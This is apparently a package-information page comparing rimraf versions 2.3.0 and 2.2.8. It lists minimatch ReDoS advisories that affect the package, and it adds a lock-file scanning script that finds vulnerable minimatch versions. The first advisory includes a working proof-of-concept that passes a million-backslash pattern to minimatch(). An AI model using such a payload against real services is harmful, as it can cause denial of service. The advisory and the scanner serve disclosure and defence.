Rimraf is a popular Node.js package providing a robust and cross-platform solution for recursively deleting files and directories, akin to the rm -rf command in Unix-like systems. Comparing versions 2.3.0 and 2.2.8 reveals key updates for developers to consider. Version 2.3.0, released in March 2015, introduces a crucial dependency update, relying on glob version ^4.4.1 for file path matching. This likely incorporates performance enhancements and bug fixes related to file system traversal and wildcard expansion that glob provides. Developers should be aware of this updated dependency, ensuring compatibility within their existing project's dependency tree.
Both versions share the same fundamental functionality, MIT license, repository information, and author details, but nearly a year separates their release dates, so 2.3.0 may carry stability improvements, performance optimizations, or bug fixes accumulated over that period. Although the provided data does not outline specific changes, the updated glob dependency points to a focus on the robustness and efficiency of file deletion. Developers seeking the most stable and current version of Rimraf should prefer 2.3.0 for its glob-based path handling and any under-the-hood improvements made between the two releases.
All vulnerabilities related to version 2.3.0 of the package
Regular Expression Denial of Service in minimatch
Affected versions of minimatch are vulnerable to regular expression denial of service attacks when user input is passed into the pattern argument of minimatch(path, pattern).
```javascript
var minimatch = require("minimatch");

// utility function for generating long strings (len copies of chr)
var genstr = function (len, chr) {
  var result = "";
  for (var i = 0; i < len; i++) {
    result = result + chr;
  }
  return result;
};

// A very long pattern of the kind the advisory describes; on an affected
// minimatch version the call below takes a long time to return.
var exploit = "[!" + genstr(1000000, "\\") + "A";

// minimatch exploit.
console.log("starting minimatch");
minimatch("foo", exploit);
console.log("finishing minimatch");
```
Update to version 3.0.2 or later.
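Since rimraf 2.3.0 pulls minimatch in transitively (rimraf depends on glob, which depends on minimatch), the practical question for a defender is whether a project's lock file still contains a minimatch below the fixed version. The following is an added example, not code from the advisory or the rimraf project: it walks a lockfile-v1-style nested `dependencies` tree and reports every minimatch older than 3.0.2 together with the chain of packages that pulled it in. The lock-file content and the glob/minimatch versions in it are constructed for illustration.

```javascript
// Fixed version named in the advisory: minimatch 3.0.2 or later is not affected.
const FIXED_VERSION = '3.0.2';

// Compare two "x.y.z" version strings numerically. Pre-release suffixes are
// dropped, which is sufficient for checking against the advisory's threshold.
// Returns -1 if a < b, 0 if equal, 1 if a > b.
function compareSemver(a, b) {
  const pa = a.split('-')[0].split('.').map(Number);
  const pb = b.split('-')[0].split('.').map(Number);
  for (let i = 0; i < 3; i++) {
    const x = pa[i] || 0;
    const y = pb[i] || 0;
    if (x !== y) return x < y ? -1 : 1;
  }
  return 0;
}

function isVulnerableMinimatch(version) {
  return compareSemver(version, FIXED_VERSION) < 0;
}

// Recursively visit nested "dependencies" objects (package-lock v1 layout) and
// collect "parent > child > ..." paths ending in a vulnerable minimatch.
function findVulnerableMinimatch(lock) {
  const hits = [];
  function walk(deps, path) {
    for (const [name, info] of Object.entries(deps || {})) {
      const here = path.concat(`${name}@${info.version}`);
      if (name === 'minimatch' && isVulnerableMinimatch(info.version)) {
        hits.push(here.join(' > '));
      }
      walk(info.dependencies, here);
    }
  }
  walk(lock.dependencies, []);
  return hits;
}

// Constructed sample lock file (hypothetical versions) modelling
// rimraf 2.3.0 -> glob -> minimatch, plus a patched top-level minimatch.
const SAMPLE_LOCK = {
  dependencies: {
    rimraf: {
      version: '2.3.0',
      dependencies: {
        glob: { version: '4.4.1', dependencies: { minimatch: { version: '2.0.1' } } },
      },
    },
    minimatch: { version: '3.0.4' },
  },
};

console.log(findVulnerableMinimatch(SAMPLE_LOCK).join('\n'));
```

Only the nested copy under rimraf > glob is reported; the top-level 3.0.4 passes the check.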
minimatch ReDoS vulnerability
A vulnerability was found in the minimatch package. This flaw allows a Regular Expression Denial of Service (ReDoS) when calling the braceExpand function with specific arguments, resulting in a Denial of Service.